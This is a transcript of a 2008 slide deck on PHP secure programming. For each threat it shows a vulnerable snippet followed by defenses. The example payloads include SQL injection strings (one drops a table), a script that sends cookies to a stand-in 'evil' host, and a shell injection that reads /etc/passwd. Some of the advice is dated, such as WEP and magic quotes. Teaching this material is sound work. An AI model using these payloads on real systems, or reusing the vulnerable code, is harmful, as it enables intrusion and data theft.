Successfully reported this slideshow.
Your SlideShare is downloading. ×

PHP Secure Programming

Advertisement

More Related Content

Advertisement
Advertisement

PHP Secure Programming

  1. 1. 1 PHP Attacks and Defense K.Bala Vignesh kbalavignesh@gmail.com
  2. 2. 2 Most Secured computer in the WORLD No Need to secure the OS No Need to secure the S/W No need to do Anything It's Naturally Secured
  3. 3. 3 Even No Need to Switch ON
  4. 4. 4 Web ­Security ? PHP ?
  5. 5. 5 Fact : 1 PHP Mainly for Web Programs Fact : 2 Easy To Learn
  6. 6. 6 PHP: 20,917,850 domains, 1,224,183 IP addresses Fact : 3 Fact : 4 More Flexible Functions
  7. 7. 7 Few Named threats Code Injection SQL Injection Cross Site Script (XSS) Session Hijacking Session Fixation Temp Files abuse Remote Execution More and More unNamed threats...
  8. 8. 8 Code Injection
  9. 9. Code Injection 9 Dont directly pass the filenames $filename = $_REQUEST['message']; $message = file_get_contents($filename); print $message; This is ok: http://example.com/myscript.php?message=hello.txt But what if I do like this?: http://example.com/myscript.php?message=passwords.txt
  10. 10. Code Injection 10 This is especially important for includes, require and require_once $module = $_REQUEST['module']; include(“lib/$module”); This is ok: http://example.com/cms?module=login.php But what if I do like this?: http://example.com/cms?module=../passwords.ini
  11. 11. Defense Code Injection 11 Make sure the value is one you expected, if not...ERROR! $requestedModule = $_REQUEST['module']; switch($requestedModule) { case “login”: $module = “login”; break; case “logout”: $module = “logout”; break; default: $module = “error”; }
  12. 12. 12 SQL Injection
  13. 13. 13 Form to user search .... $username=$_POST['username']; $query= "SELECT * FROM users WHERE name = ' “ .$username." ' ;" If i give , $username ­­­a' or 't'='t Query will be , "SELECT * FROM users WHERE name = ' a' or 't'='t ';" SQL Injection
  14. 14. 14 If i give , $username ­­­a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '% Query will be , SELECT * FROM users WHERE name = ' a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% '; SQL Injection
  15. 15. 15 Use single quotation eg: "select * from users where user= '.$username.'" Check types of user submitted values is_bool(), is_float(), is_numeric(), is_string(), is_int() , intval() , settype() ,strlen() eg: strpos($query , ';') Escape every questionable character in your query ' " , ; ( ) and keywords "FROM", "LIKE", and "WHERE" mysql_real_escape_string SQL Injection Defense
  16. 16. 16 magic_quotes_gpc (default – on ) (deprecation – php 6.0) If Off use addslashes If On , If you don't need stripslashes if (get_magic_quotes_gpc()){ $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } SQL Injection Defense
  17. 17. 17 Mysql Improved Extension $query=mysqli_prepare($connection_string, "select * from user where user= ?"); mysqli_stmt_bind_param($query,"s",$username); mysqli_stmt_execute($query); s­string i­integer d­double b­binary PEAR ­DB, DataObject SQL Injection Defense
  18. 18. 18 XSS – Cross Site Scripting
  19. 19. 19 1.) Inserting scripts <script> document.location = 'http://evil.example.org/steal_cookies.php?cookies=' + document.cookie </script> 2.) Login 3.) Set Cookies 4.) Executes the scripts XSS 5.) Steals the cookies
  20. 20. 20 Remote control of the client browser Reveal the value of a cookie Change links on the page Redirect to another URI Render a bogus form or Any undesirable action ... XSS
  21. 21. Defense XSS Encode HTML Entities in All Non­HTML Output 21 htmlentities() Eg: $str = "A 'quote' is <b>bold</b>"; echo htmlentities($str); Outputs Will be ­> A 'quote' is &lt;b&gt;bold&lt;/b&gt; Check the image upload URI (avatar, icon) parse_url Eg: <img src=”http://shopping.example.com/addCart.php?item=123”/> Show the domain name for User submitted Links eg. Not safe ­­> Hey click this to see my photo <a href=”http://badguys.net”>Bala</a> safe ­­> Hey click this to see my photo [badguys.net] Bala
  22. 22. 22 Session Hijacking
  23. 23. 23 What is Session ID ?
  24. 24. 24 Victim Attacker Web Server Session ID= AD238723FD32 Session Hijacking
  25. 25. 25 Victim Attacker Web Server Session ID= AD238723FD32 Session ID= AD238723FD32 Session Hijacking
  26. 26. Session Hijacking 26 Network Eavesdropping ­Promiscuous Mode If Intranet ? Use Switch rather than a Hub If wi­fi ? WEP ­Weired Equivalent Privacy If Internet ? SSL
  27. 27. 27 Session Hijacking Unwitting Exposure Sending links See this item ­­­­http:// store.com/items.php?item=0987 it's O.K , if i send like this, http://store.com/items.php?item=0987&phpsessid=34223 How to Avoid ? session.use_trans_sid (turned off by default) session.use_only_cookies (Defaults to 1 (enabled) since PHP 6.0.)
  28. 28. 28 2.) If he clicks, http://unsafesite?SID=3423 3. Shows login page Victim Session Fixation Attacker Web Server 1.) See this link http://unsafesite?SID=3423 Set SessionID =3423 session_id($_GET['SID']) 4.) Now Full Access http://unsafesite?SID=3423
  29. 29. 29 Session Hijacking Defense Use SSL. Use Cookies Instead of $_GET Variables. (ini_set ('session.use_only_cookies',TRUE); ini_set ('session.use_trans_sid',FALSE); Use Session Timeouts ini_set('session.cookie_lifetime',1200) ini_set('session.gc_maxlifetime) Regenerate IDs for Users with Changed Status session_regenerate_id
  30. 30. 30 Remote Execution
  31. 31. Remote Execution 31 Injection of Shell commands <?php $filename=$_GET['filename']; $command='/usr/bin/wc $filename”; $words=shell_exec ($command); print “$filename contains $words words.”; ?> This is ok ... wordcount.php?filename=textfile.txt But, What if i give like this ... wordcount.php?filename=%2Fdev%2Fnull%20%7C%20cat%20%2Fetc%2Fpasswd (filename ­­> /dev/null | cat /etc/passwd ) /usr/bin/wc /dev/null |cat /etc/passwd
  32. 32. Remote Execution 32 Defense Allow only Trusted , Human Users to Import Code Store uploads outside of Web Document Root Limit allowable filename extensions for upload Use disable_functions directive eg: disable_functions= “eval,phpinfo” Do not include PHP scripts from Remote Servers eg: <?php include ('http://example.net/code/common.php') ?> Properly escape all shell commands escapeshellarg() , escapeshellcmd()
  33. 33. 33 Future? ­PHP 6.0 Deprecation Register Globals Big security hole Safe Mode False sense of security Magic Quotes Messed with the data Upcoming changes and features http://www.php.net/~derick/meeting­notes. html http://www.phphacks.com/content/view/49/33/ Rasmus Lerdorf – PHP 6.0 Wish List http://news.php.net/php.internals/17883
  34. 34. 34 What to do? Proper Input Validation Dont do Programming + Security Do secure Programming htmlentities, mysql_real_escape_string, parse_url , addslashes ,escapeshellarg, escapeshellcmd... etc SSL Use PEAR , PECL
  35. 35. Images From Flickr.com 35 reference­http:// flickr.com/photos/opinicus/246099418/ remote_boy ­http:// flickr.com/photo_zoom.gne?id=331355695&size=l level_cross ­http:// flickr.com/photo_zoom.gne?id=67342604&size=o injection3­http:// flickr.com/photos/fleurdelisa/249435636/ building game1­http:// flickr.com/photo_zoom.gne?id=346575350&size=o computer_baby1­http:// flickr.com/photo_zoom.gne?id=102207751&size=o country_border1 ­http:// flickr.com/photo_zoom.gne?id=48740674&size=l computer_baby ­http:// flickr.com/photo_zoom.gne?id=436594815&size=m hijack ­http:// flickr.com/photo_zoom.gne?id=463129891&size=l dog_security ­http:// flickr.com/photo_zoom.gne?id=2205272682&size=l Id card ­http:// flickr.com/photo_zoom.gne?id=1269802640&size=o
  36. 36. 36 Reference Pro PHP Security Chris Snyder , Michael Southwell http://wikipedia.org/ http://www.sitepoint.com/article/php­security­blunders http://phpsec.org/ WWW.google.com
  37. 37. 37
  38. 38. 38
  39. 39. Copyright (c) 2008 Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. http://www.gnu.org/copyleft/fdl.html

×